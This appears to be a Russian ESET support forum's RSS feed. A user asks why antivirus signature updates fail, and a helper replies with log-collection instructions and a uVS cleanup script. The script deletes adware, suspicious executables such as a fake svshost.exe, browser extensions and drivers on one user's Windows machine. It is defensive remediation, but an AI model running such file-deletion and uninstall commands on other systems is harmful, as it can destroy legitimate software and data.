delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&#38;PRODVERSION=38.0&#38;X=ID%3DHCADGIJMEDBFGCIEGJOMFPJCDCHLHNIF%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&#38;PRODVERSION=38.0&#38;X=ID%3DOELPKEPJLGMEHAJEHFEICFBJDIOBDKFJ%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&#38;PRODVERSION=38.0&#38;X=ID%3DOILHEBPJHNJAEGHEDPJNMAJAJLCFDJGC%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&#38;PRODVERSION=38.0&#38;X=ID%3DOJLCEBDKBPJDPILIGKDBBKDKFJMCHBFD%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTP://WWW.BING.COM/SEARCH?Q={SEARCHTERMS}&#38;SRC=IE-SEARCHBOX&#38;FORM=IESR02
delref HTTP://WWW.YOUNDOO.COM/?Z=1BAF3F7FB08168DB8CB1A45GEZBM0C5G9W7WBZ1M6Z&#38;FROM=AMZ&#38;UID=SAMSUNGXSP1654N_S0GEJ1VL900798&#38;TYPE=HP
delref SEARCH.MPC.AM
delref HTTP://WWW.STARTGO123.COM/SEARCH/INDEX
delref HTTP://MAIL.RU/CNT/10445?GP=822313
delref HTTP://MAIL.RU/CNT/10445?GP=811036
delref HTTP://MAIL.RU/CNT/10445?GP=811560
delref HTTP://MAIL.RU/CNT/10445?GP=811009
delref HTTP://GO.MAIL.RU/DISTIB/EP/?Q={SEARCHTERMS}&#38;PRODUCT_ID=%7B6674A314-E8B5-4E5A-8AEF-855330E4A90D%7D&#38;GP=811014
delref HTTP://MAIL.RU/CNT/10445?GP=811013
del %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;ROAMING&#92;MICROSOFT&#92;WINDOWS&#92;START MENU&#92;PROGRAMS&#92;АМИГО.LNK
del %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;ROAMING&#92;MICROSOFT&#92;INTERNET EXPLORER&#92;QUICK LAUNCH&#92;АМИГО.LNK
apply

;-------------------------------------------------------------

delref HTTP://AMTOMIL.RU/F.EXE
delall %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;AMIGO&#92;APPLICATION&#92;AMIGO.EXE
exec32 "C:&#92;ProgramData&#92;Package Cache&#92;{277af691-7c0f-478e-9fb6-62efeead0faa}&#92;setup.exe"&nbsp;&nbsp;/uninstall
uidel&nbsp;&nbsp;"C:&#92;ProgramData&#92;Package Cache&#92;{277af691-7c0f-478e-9fb6-62efeead0faa}&#92;setup.exe"&nbsp;&nbsp;/uninstall
uidel "C:&#92;Users&#92;Дмитрий&#92;AppData&#92;Local&#92;Amigo&#92;Application&#92;56.0.2924.197&#92;Installer&#92;setup.exe" --uninstall
deltmp
sreg

delall %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;SVSHOST&#92;SVSHOST.EXE
delall %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;ROAMING&#92;CURL&#92;CURL_7_54.EXE
delref %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;GOOGLE&#92;CHROME&#92;USER DATA&#92;DEFAULT&#92;EXTENSIONS&#92;FIIBKHOKMFKKADMPAIGIJMGMLFENPCHK&#92;16.6226.216_1&#92;TESTTRUE ДЛЯ ТЕБЯ
delref %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;GOOGLE&#92;CHROME&#92;USER DATA&#92;DEFAULT&#92;EXTENSIONS&#92;LPHICBBHFMLLGMOMKKHJFKPBDLNCAFBN&#92;2.1.4_0&#92;LETYSHOPS
delall %Sys32%&#92;EA3HOST.EXE
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;ADGUARD.EXE
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;ADGUARD&#92;ADGUARDSVC.EXE
delref %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;KINGOSOFT&#92;KINGO ROOT&#92;UPDATE_27205&#92;BIN&#92;CHECKUPDATE.EXE
delref %SystemDrive%&#92;USERS&#92;ДМИТРИЙ&#92;APPDATA&#92;LOCAL&#92;KINGOSOFT&#92;KINGO ROOT&#92;UPDATE_27205&#92;BIN&#92;KINGOSOFTSERVICE.EXE
delref %Sys32%&#92;DRIVERS&#92;AKSDF.SYS
delref %Sys32%&#92;DRIVERS&#92;AKSFRIDGE.SYS
delref %Sys32%&#92;DRIVERS&#92;HARDLOCK.SYS
delref %Sys32%&#92;HASPLMS.EXE
delref %SystemDrive%&#92;PROGRAM FILES (X86)&#92;COMMON FILES&#92;ALADDIN SHARED&#92;HASP&#92;HASPVLIB_64747.DLL
areg




</pre>
=============
<br /><br />+<br />Далее создайте новый образ автозапуска в uVS <br />
			<i>06.07.2017 14:50:25, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99818/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99818/</guid>
			<pubDate>Thu, 06 Jul 2017 14:50:25 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99816/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			ссылки на логи/журнал<br /><noindex><a href="http://rgho.st/6SDxfpjvq" target="_blank" rel="nofollow">http://rgho.st/6SDxfpjvq</a></noindex><br /><noindex><a href="http://rgho.st/7MDSQNzHr" target="_blank" rel="nofollow">http://rgho.st/7MDSQNzHr</a></noindex> <br />
			<i>06.07.2017 14:27:25, Дмитрий Столяров.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99816/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99816/</guid>
			<pubDate>Thu, 06 Jul 2017 14:27:25 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99812/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			<br />====quote====<br /><a class="blog-p-user-name" id="bp_SN37XENI" href="/user/29804/" bx-tooltip-user-id="29804">Дмитрий Столяров</a> написал:<br />версия баз данных 14855<br /><br />=============<br /><br />Актуальная версия сейчас : 15701<br />Так, что ваша версия баз действительно устарела.<br /><br /><br />1) Создайте образ автозапуска в uVS<br /><noindex><a href="http://forum.esetnod32.ru/forum9/topic2687/" target="_blank" rel="nofollow">http://forum.esetnod32.ru/forum9/topic2687/</a></noindex><br /><br />2) Скачайте программу SysInspector по ссылке:<br /><br />Для 32-битных ОС:<br /><noindex><a href="http://download.eset.com/download/sysinspector/32/RUS/SysInspector.exe" target="_blank" rel="nofollow">http://download.eset.com/download/sysinspector/32/RUS/SysInspector.exe</a></noindex><br />Для 64-битных ОС:<br /><noindex><a href="http://download.eset.com/download/sysinspector/64/RUS/SysInspector.exe" target="_blank" rel="nofollow">http://download.eset.com/download/sysinspector/64/RUS/SysInspector.exe</a></noindex><br /><br />Чтобы сохранить лог файл необходимо нажать в верхнем правом углу программы кнопку "файл" , затем выбрать "сохранить журнал".<br />Название файла будет иметь вид "SysInspector-имя вашего компьютера-дата.zip"<br /><br />Лог файл прикрепите к вашему сообщению на форуме или разместите на файлообменнике:<br />( <noindex><a href="http://rghost.ru" target="_blank" rel="nofollow">http://rghost.ru</a></noindex> &nbsp;), указав на форуме в своей теме ссылку на этот архив. <br />
			<i>06.07.2017 12:45:52, RP55 RP55.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99812/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99812/</guid>
			<pubDate>Thu, 06 Jul 2017 12:45:52 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
		<item>
			<title>Баз данных сигнатур вирусов устарела</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum5/topic14128/message99811/">Баз данных сигнатур вирусов устарела</a></b> <i>обновление не помогает</i> в форуме <a href="http://forum.esetnod32.ru/forum5/">Обновление антивируса</a>. <br />
			Добрый день, на домашней странице программа пишет грозное уведомление &quot;Баз данных сигнатур вирусов устарела&quot; , после попытки обновиться<br />пишет &quot;обновление не требуется&quot; ....типа всё актуально.<br />Последнее успешное обновление 5 июня, версия баз данных 14855<br />Что не так? что исправить, чтобы обновления проходили корректно? <br />версия ESET SS 10.0.390.0 <br />
			<i>06.07.2017 10:46:05, Дмитрий Столяров.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum5/topic14128/message99811/</link>
			<guid>http://forum.esetnod32.ru/messages/forum5/topic14128/message99811/</guid>
			<pubDate>Thu, 06 Jul 2017 10:46:05 +0300</pubDate>
			<category>Обновление антивируса</category>
		</item>
	</channel>
</rss>
